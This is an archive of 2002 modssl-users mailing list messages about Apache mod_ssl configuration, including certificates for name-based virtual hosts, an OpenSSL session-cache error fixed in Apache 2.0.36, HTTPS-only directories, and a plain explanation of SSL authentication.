Message-Id: <200205062124.g46LOwN18455@splat.grant.org>
From: Michael Grant 
To: modssl-users@modssl.org
Subject: Re: virtual hosting and ssl
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Michael Grant 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> I have made this work, however there are drawbacks to this solution.

Grrr, I take it back, I can't reproduce it now.  I still get the "name 
check, site name does not match certificate" warning before it follows 
the redirect.

> 1) you need at least 2 certs, one for the virtual hosting server and
> the second one for the client (in our example, server.cert and
> acme.com.cert).  If you used self-signed certs, the user is asked
> TWICE to accept the cert, one for the server.cert and secondly for the 
> acme.com cert.
> 
> 2) when you contact https://acme.com, what you end up with in the
> browser's location is actually "https://acme.com:8443".  If someone
> bookmarks this and you rearrange your port numbers, they're screwed.
> 
> 
> 
>         ServerAdmin webmaster@acme.com
>         ServerName acme.com
>         Redirect / https://acme.com:8443
>         SSLCertificateFile /path/to/original/server.cert 
>         SSLCertificateKeyFile /path/to/original/server.key
> 
> 
> 
>         ServerAdmin webmaster@perigee.com
>         ServerName perigee.com
>         Redirect / https://perigee.com:8444
>         SSLCertificateFile /path/to/original/server.cert 
>         SSLCertificateKeyFile /path/to/original/server.key
> 
> 
> 
> 
>         ServerAdmin webmaster@acme.com
>         ServerName acme.com
>         DocumentRoot /var/www/acme.com
>         SSLCertificateFile /path/to/original/acme.com.cert 
>         SSLCertificateKeyFile /path/to/original/acme.com.key
> 
> 
> 
>         ServerAdmin webmaster@perigee.com
>         ServerName perigee.com
>         DocumentRoot /var/www/perigee.com
>         SSLCertificateFile /path/to/original/perigee.com.cert 
>         SSLCertificateKeyFile /path/to/original/perigee.com.key
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 03:33:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA12267; Tue, 7 May 2002 03:32:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from sidehack.sat.gweep.net id DAA12263; Tue, 7 May 2002 03:31:56 +0200 (MET DST)
Received: (qmail 78456 invoked by uid 908); 7 May 2002 01:31:54 -0000
Date: Mon, 6 May 2002 21:31:54 -0400
From: MegaZone 
To: modssl-users@modssl.org
Subject: (OpenSSL library error follows) - in Apache 2.0.35 with mod_ssl
Message-ID: <20020506213154.A78374@sidehack.sat.gweep.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
Organization: WPI Discordian Society, Undocumented Cabal of the Accursed Saint Shiranto Joe
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: MegaZone 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

When I try to connect via https:// I get this in my log:

(servername obscured by me, sorry, policy, et al)

[06/May/2002 21:07:05 21504] [info]  Connection to child 2 established (server [server]:443, client 192.32.224.59)
[06/May/2002 21:07:05 21504] [info]  Seeding PRNG with 136 bytes of entropy
[06/May/2002 21:07:05 21504] [error] Unable to set session id context to `[server]:443' (OpenSSL library error follows)
[06/May/2002 21:07:05 21504] [error] OpenSSL: error:140DA111:lib(20):func(218):reason(273)

I can't seem to find a place to lookup that error - any help?

This is with OpenSSL 0.9.6c compiled with 'config shared' with 
Apache 2.0.35 compiled with  
./configure --prefix=/local/webhome/apache-2.0.35 --enable-mods-shared="ssl" \
--with-ssl="/usr/local/ssl"

Solaris 8.

I'm thinking the certs used on this test box might be a problem, but I
don't want to go off on a wild goose chase.

Thanks.

-MZ, CISSP #3762, RHCE #806199299900541
-- 

	from deepthought.cs.virginia.edu id DAA12590; Tue, 7 May 2002 03:38:48 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g471ckq00315;
	Mon, 6 May 2002 21:38:46 -0400
Date: Mon, 6 May 2002 21:38:46 -0400 (EDT)
From: Cliff Woolley 
X-X-Sender: root@deepthought.cs.virginia.edu
To: MegaZone 
cc: modssl-users@modssl.org
Subject: Re: (OpenSSL library error follows) - in Apache 2.0.35 with mod_ssl
In-Reply-To: <20020506213154.A78374@sidehack.sat.gweep.net>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, 6 May 2002, MegaZone wrote:

> [06/May/2002 21:07:05 21504] [error] Unable to set session id context to `[server]:443' (OpenSSL library error follows)
> [06/May/2002 21:07:05 21504] [error] OpenSSL: error:140DA111:lib(20):func(218):reason(273)

Let me guess, SHMCB, right?  Download 2.0.36 (released today) and use
that.  SHMCB is now fixed.

--Cliff

--------------------------------------------------------------
   Cliff Woolley
   cliffwoolley@yahoo.com
   Charlottesville, VA


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 04:38:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id EAA15907; Tue, 7 May 2002 04:37:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from sidehack.sat.gweep.net id EAA15855; Tue, 7 May 2002 04:36:11 +0200 (MET DST)
Received: (qmail 83022 invoked by uid 908); 7 May 2002 02:36:07 -0000
Date: Mon, 6 May 2002 22:36:06 -0400
From: MegaZone 
To: modssl-users@modssl.org
Subject: Re: (OpenSSL library error follows) - in Apache 2.0.35 with mod_ssl
Message-ID: <20020506223606.A82656@sidehack.sat.gweep.net>
References: <20020506213154.A78374@sidehack.sat.gweep.net> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
In-Reply-To: ; from jwoolley@apache.org on Mon, May 06, 2002 at 09:38:46PM -0400
Organization: WPI Discordian Society, Undocumented Cabal of the Accursed Saint Shiranto Joe
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: MegaZone 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Once upon a time Cliff Woolley shaped the electrons to say...
> Let me guess, SHMCB, right?  Download 2.0.36 (released today) and use
> that.  SHMCB is now fixed.

Right on!

Ok, I've been here 13.5 hours today, it works now.  I'm bailing. ;-)

Thanks.

(Wisdom I relearned today - use explicit paths.  You never know when
someone else has left an old install laying around earlier in your
build path.  Like, say, a non-shared openssl which makes a shared
apache+mod_ssl sad...  Not that I wasted a lot of time on that...)

-MZ, CISSP #3762, RHCE #806199299900541
-- 
 Gweep, Discordian, Author, Engineer, me..
"A little nonsense now and then, is relished by the wisest men" 781-788-0130
   Eris


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 06:41:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA24084; Tue, 7 May 2002 06:40:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id GAA24080; Tue, 7 May 2002 06:40:13 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Mon, 6 May 2002 21:40:07 -0700
Received: from 61.187.56.10 by lw9fd.law9.hotmail.msn.com with HTTP;
	Tue, 07 May 2002 04:40:07 GMT
X-Originating-IP: [61.187.56.10]
From: "zhong duhang" 
To: modssl-users@modssl.org
Subject: how to configure it?
Date: Tue, 07 May 2002 12:40:07 +0800
Mime-Version: 1.0
Content-Type: text/plain; charset=gb2312; format=flowed
Message-ID: 
X-OriginalArrivalTime: 07 May 2002 04:40:07.0419 (UTC) FILETIME=[43719CB0:01C1F581]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "zhong duhang" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I want one directory can be visited by https,while others visit by http,how 
should I configure it? 


_________________________________________________________________
Ãâ·ÑÏÂÔØ MSN Explorer£ºhttp://explorer.msn.com/lccn/intl.asp

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 06:46:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA24380; Tue, 7 May 2002 06:45:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from omta02.mta.everyone.net id GAA24328; Tue, 7 May 2002 06:44:45 +0200 (MET DST)
Received: from sitemail.everyone.net (dsnat [216.200.145.62])
	by omta02.mta.everyone.net (Postfix) with ESMTP id 5AD791C509C
	for ; Mon,  6 May 2002 21:44:44 -0700 (PDT)
Received: by sitemail.everyone.net (Postfix, from userid 99)
	id 064F42757; Mon,  6 May 2002 21:44:44 -0700 (PDT)
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
Mime-Version: 1.0
X-Mailer: MIME-tools 5.41 (Entity 5.404)
Date: Mon, 6 May 2002 21:44:43 -0700 (PDT)
From: Nisarg Rav 
To: modssl-users@modssl.org
Cc: modssl-users@modssl.org
Subject: Re: virtual hosting and ssl
X-Originating-Ip: [203.88.129.229]
Message-Id: <20020507044444.064F42757@sitemail.everyone.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Nisarg Rav 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

ya one thing to say ..

have u enabled following directive for those all domains 

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0	
and then try

hth 

--- Michael Grant  wrote:
>I've been playing around with the apache and our virtual hosts.  I am
>well aware that I could have different certs for each IP address if I
>were using IP based virtual hosting but I'm using name based virtual
>hosts.
>
>I host a variety of domains which are not at all subdomains of my main 
>domain.  What I would like to do is have one cert for all my domains.
>
>I sort of have it working with name based virtual hosting, but in some
>cases, I get the following warning in Internet Explorer:
>
>"The name on the security certificate does not match the name of the
>site."
>
>It appears that some web browsers, Netscape for example, support a *
>as a wild card in the CN.  For example CN=*grant.org.  There's also
>some talk on Microsoft's web site of some versions of IE supporting
>this too.  Though, apparently not 5.01 running on windows 98 or me. 
>
>The cases seem to be:
>
>1) I generate a cert with CN=grant.org.  No complaints when I connect
>to https://grant.org.  Both Netscape & IE complain if I connect to
>www.grant.org or any other of my domains.
>
>2) I generate a cert with CN=*grant.org.  No complaints when I connect 
>to https://www.grant.org or https://grant.org from Netscape.  IE
>complains that the name is incorrect.  I can import the self-signed
>cert into both IE's and Netscape's trusted root ca list.
>
>3) I generate a cert with CN=*.  No complaints when I connect to any
>of my domains with Netscape, however IE complains that the name is
>incorrect.  I can import the self-signed cert into Netscape's trusted
>root ca list but NOT IE's.
>
>Can someone tell me if there is a right way to generate a cert that
>works with more than one site with the various different browsers out
>there? 
>
>Michael Grant
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

_____________________________________________________________
Want a new web-based email account ? ---> http://www.firstlinux.net

_____________________________________________________________
Promote your group and strengthen ties to your members with email@yourgroup.org by Everyone.net  http://www.everyone.net/?btn=tag
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 10:33:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA07579; Tue, 7 May 2002 10:32:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bull1.bourse.ch id KAA07541; Tue, 7 May 2002 10:31:50 +0200 (MET DST)
Received: (from nobody@localhost)
	by bull1.bourse.ch (8.8.8+Sun/8.8.8) id KAA02838
	for ; Tue, 7 May 2002 10:31:43 +0200 (MET DST)
X-Authentication-Warning: bull1.bourse.ch: nobody set sender to  using -f
Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1)
	id xma002836; Tue, 7 May 02 10:31:36 +0200
Received: from regulus.bourse.ch (regulus [172.20.196.148])
	by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id KAA00280
	for ; Tue, 7 May 2002 10:31:36 +0200 (MET DST)
Received: from bourse.ch (localhost [127.0.0.1])
	by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA28766
	for ; Tue, 7 May 2002 10:31:34 +0200 (MEST)
Message-ID: <3CD790E6.E84144BD@bourse.ch>
Date: Tue, 07 May 2002 10:31:34 +0200
From: Owen Boyle 
X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: virtual hosting and ssl
References: <200205061430.g46EUNF17878@splat.grant.org> <3CD698EE.5AF888A@bourse.ch> <000801c1f510$2dc43600$0a00000a@dumbledore>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Owen Boyle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Steve Leach wrote:
> 
> Owen,
> 
> I just followed this thread - thanks for that condensed 'how it works' for
> certificates - I picked up two things I did not know, and as they say
> knowledge is power :)
> 
> I am wondering at the last statement as to whether the limitation lies in
> the ability to produce a certificate that could verify all hosted domains,
> or whether Apache (or indeed any HTTPS server) could  work with such a
> beast?

As I understand it, the trouble is that there are two aspects to SSL:
encryption and authentication. If it was only about encryption, you
wouldn't have to tie your certificates to the different sites - so you
could just serve up a general server-certificate which would contain
your public key (which is, after all, just a big long number). The
client would use this to send you a session-key and you'd have
established the secure channel. Then you could exchange the HTTPS
packets in confidence and use the "Host:" fields therein to select
virtualhosts. Indeed, this is what happens when people naively set up
NBVHs on port 443 - the server just uses the certificate from the first
VH for any request it receives.

However, we've forgotten about authentication. If you really want a
secure connection, it is no use just encrypting the datastream; you have
to be sure that the packets are really going to the destination you
want. If you send your credit card details to www.amazon.com how can you
be sure that the server at the other end really does belong to Amazon
Books Inc. and is not a fake server with a copy of their site and that
some crook has not hijacked a router somewhere along the way? The answer
is that when you get the cert from amazon.com it contains not only the
public key but also their site name. Their cert has also been signed by
Verisign or somesuch and so can be verified. 

Now you can't just make a self-signed cert which says you're amazon.com
because "the browser does not recognise the authority which signed this
certificate". 

Really, these "problems" are all client-side. The server is only
interested in setting up a secure channel so will use any cert that
seems appropriate. The trouble only starts when the browser starts
checking out the cert and finds that it can't verify it because the
signing authority is unknown or that it looks fishy because the
site-name on the request doesn't match the site-name in the cert. This
is really just the browser manufacturers protecting you from being
conned and themselves from being sued.

Rgds,

Owen Boyle.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 10:37:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA07868; Tue, 7 May 2002 10:36:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bull1.bourse.ch id KAA07800; Tue, 7 May 2002 10:35:20 +0200 (MET DST)
Received: (from nobody@localhost)
	by bull1.bourse.ch (8.8.8+Sun/8.8.8) id KAA02868
	for ; Tue, 7 May 2002 10:35:13 +0200 (MET DST)
X-Authentication-Warning: bull1.bourse.ch: nobody set sender to  using -f
Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1)
	id xma002866; Tue, 7 May 02 10:35:04 +0200
Received: from regulus.bourse.ch (regulus [172.20.196.148])
	by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id KAA00479
	for ; Tue, 7 May 2002 10:35:04 +0200 (MET DST)
Received: from bourse.ch (localhost [127.0.0.1])
	by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA29168
	for ; Tue, 7 May 2002 10:35:02 +0200 (MEST)
Message-ID: <3CD791B6.8F499837@bourse.ch>
Date: Tue, 07 May 2002 10:35:02 +0200
From: Owen Boyle 
X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: how to configure it?
References: 
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Owen Boyle 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

zhong duhang wrote:
> 
> I want one directory can be visited by https,while others visit by http,how
> should I configure it?

Use port-based virtualhosts. Something like (where 192.168.1.1 = server
ip-addr):

Listen 192.168.1.1:80

  DocumentRoot /path/to/http/content



Listen 192.168.1.1:443

  DocumentRoot /path/to/ssl/content
  SSL directives...



Rgds,

Owen Boyle.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 10:54:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA08936; Tue, 7 May 2002 10:53:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id KAA08923; Tue, 7 May 2002 10:52:45 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id EAA14095
	for ; Tue, 7 May 2002 04:53:12 -0400
Date: Tue, 7 May 2002 04:53:12 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: Re: virtual hosting and ssl
In-Reply-To: <3CD790E6.E84144BD@bourse.ch>
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


The ony other issue one really has that  Owen has not covered, is trsting
the issuing CA to do things correctly. There's an incident not too long in
the past whence a site not Microsoft affilliated obtained a fake microsoft
cert.  Of course there are also man in the middle exploits, even with ssl
and ssh, though they tend to be rare and hard to impliment, for the most
part.  With wireless being the new toy in use by many, there are issues of
information leakage too, but these are different topics in and of
themselves...

Cool writeup Owen, we;re saving it here to send out as common requests
come in.

Thanks,

Ron DuFresne


On Tue, 7 May 2002, Owen Boyle wrote:

> Steve Leach wrote:
> > 
> > Owen,
> > 
> > I just followed this thread - thanks for that condensed 'how it works' for
> > certificates - I picked up two things I did not know, and as they say
> > knowledge is power :)
> > 
> > I am wondering at the last statement as to whether the limitation lies in
> > the ability to produce a certificate that could verify all hosted domains,
> > or whether Apache (or indeed any HTTPS server) could  work with such a
> > beast?
> 
> As I understand it, the trouble is that there are two aspects to SSL:
> encryption and authentication. If it was only about encryption, you
> wouldn't have to tie your certificates to the different sites - so you
> could just serve up a general server-certificate which would contain
> your public key (which is, after all, just a big long number). The
> client would use this to send you a session-key and you'd have
> established the secure channel. Then you could exchange the HTTPS
> packets in confidence and use the "Host:" fields therein to select
> virtualhosts. Indeed, this is what happens when people naively set up
> NBVHs on port 443 - the server just uses the certificate from the first
> VH for any request it receives.
> 
> However, we've forgotten about authentication. If you really want a
> secure connection, it is no use just encrypting the datastream; you have
> to be sure that the packets are really going to the destination you
> want. If you send your credit card details to www.amazon.com how can you
> be sure that the server at the other end really does belong to Amazon
> Books Inc. and is not a fake server with a copy of their site and that
> some crook has not hijacked a router somewhere along the way? The answer
> is that when you get the cert from amazon.com it contains not only the
> public key but also their site name. Their cert has also been signed by
> Verisign or somesuch and so can be verified. 
> 
> Now you can't just make a self-signed cert which says you're amazon.com
> because "the browser does not recognise the authority which signed this
> certificate". 
> 
> Really, these "problems" are all client-side. The server is only
> interested in setting up a secure channel so will use any cert that
> seems appropriate. The trouble only starts when the browser starts
> checking out the cert and finds that it can't verify it because the
> signing authority is unknown or that it looks fishy because the
> site-name on the request doesn't match the site-name in the cert. This
> is really just the browser manufacturers protecting you from being
> conned and themselves from being sued.
> 
> Rgds,
> 
> Owen Boyle.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 11:26:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA11132; Tue, 7 May 2002 11:25:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id LAA11052; Tue, 7 May 2002 11:24:03 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g479NWv24367;
	Tue, 7 May 2002 09:23:37 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Tue, 7 May 2002 10:23:29 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02067003@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Cc: jbertscheit@web.de
Subject: RE: Re: WIN32-apache 1.3.x (windows NT) problem of serving concur
	rent https requests
Date: Tue, 7 May 2002 10:23:28 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



> -----Original Message-----
> From: Johannes Bertscheit [mailto:jbertscheit@web.de]
> Sent: 04 May 2002 18:27
> To: modssl-users@modssl.org
> Cc: jbertscheit@web.de
> Subject: Re: Re: WIN32-apache 1.3.x (windows NT) problem of serving
> concurrent https requests
> snip]
> No question: I would also prefer to develop under LINUX SOO MUCH (!) 
> but I have no choice: 
> the project is bound to windows NT hosts and I was not able 
> to convince 
> the company to take LINUX (or UNIX) - I tried all the 
> arguments as you stated above.
> So what I need are other people with the same problem, that 
> they MUST develop under windows NT and have a RELIABLE apache 
> running on such a machine.
> Are there any people out there - stating that they have a 
> apache mod_ssl 
> running on windows NT RELIABLE ???
> 
> johannes

We have an expression in the UK that you can't make a silk purse out of a
sow's ear. 

I have had blue screen logging in with Windows NT and reboots on logging in
to Windows 2000, both fully patched. We are regularly rebooting our Windows
NT servers on an almost monthly basis. If you look at Microsoft's own web
site via Netcraft (www.netcraft.co.uk), you'll see that none of their
servers has run for more than about 90 days. One server managed to get to
143 days before a reboot. So much for 99.999% availability. They boasted
that they'd run 99.98% availability during the Winter Games, which sounds
good till you realise that this is over a period of about two weeks. You
don't hear them talk about the "five nines" any more, simply because they
can't do it.

If you look at our site, www.rnib.org.uk you'll see we just passed 150 days.
It would have been longer if it weren't for a power cut. I've had a Linux
server pass 497 days uptime, before it was moved to a new site:

  2:43pm  up 497 days,  2:27,  0 users,  load average: 0.00, 0.00, 0.00
  2:44pm  up 0 min,  0 users,  load average: 0.00, 0.00, 0.00

The uptime counter on Linux resets after 497 days, whereas on NT it resets
after 49.7 days. It's still possible to track uptime for longer though.

The longest uptimes in the world are nearly all Apache servers on BSD or
IRIX (http://uptime.netcraft.com/up/today/top.avg.htm). You won't find an NT
server staying up for long.

What is running on the host is irrelevant. We use Samba to publish our web
pages from Windows clients. We have had occasional Samba crashes, but the
web server has been totally reliable. In over six years, I've seen only one
spurious crash of the web server, all other downtime has been for
maintainence.

Why spend money on Microsoft's licenses, when you can install Linux or any
other type of UNIX for far less money? 

In Latin you would say "res ips a loquitor" (I'm not sure of the spelling,
but it means "the thing speaks for itself". It's used a lot in law).

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

The teaching of evolution as a proven fact rather than a theory has done
more harm to scientific progress than anything else in history.

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to
find out all about it.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May  7 11:35:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA11583; Tue, 7 May 2002 11:34:08 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id LAA11573; Tue, 7 May 2002 11:33:36 +0200 (MET DST)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g479XFv25095
	for ; Tue, 7 May 2002 09:33:20 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Tue, 7 May 2002 10:33:12 +0100
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02067004@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: Repudiability
Date: Tue, 7 May 2002 10:33:11 +0100 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> -----Original Message-----
> From: Andrew McNaughton [mailto:andrew@scoop.co.nz]
> Sent: 06 May 2002 16:55
> To: modssl-users@modssl.org
> Subject: Repudiability
> 
> 
> 
> Suppose someone refutes that they have sent information to a Web site
> owner, how is the Web site owner to prove that the information was in
> fact received and that it was signed with a given key?
> 
> To do this, the Web site owner would presumably need to be 
> able to produce
> the still-encrypted post as sent by the user, but from a 
> quickish reading
> of the mod_ssl reference, I don't see any way to log this information.
> 
> Andrew McNaughton

Provided you know the time of the transaction, the web server logs will give
you details of the IP address all the web transactions are coming from. You
can find who owns this IP address via the Ripe (www.ripe.net), Arin
(www.arin.net) or Apnic (www.apnic.net) websites.

>From this you can find which ISP this address belongs to, and that ISP can
verify who was using that IP address at the time. How much assistance you
receive from each ISP will vary.

That may give you sufficient information to press a case against the person
who alleges they didn't access your website, but IANAL. 

I'm not sure what you mean about information being signed with a given key.
Do you mean a personal key like a digital signature, or do you mean the SSL
key?

- 
John Airey
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

The teaching of evolution as a proven fact rather than a theory has done
more harm to scientific progress than anything else in history.

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 

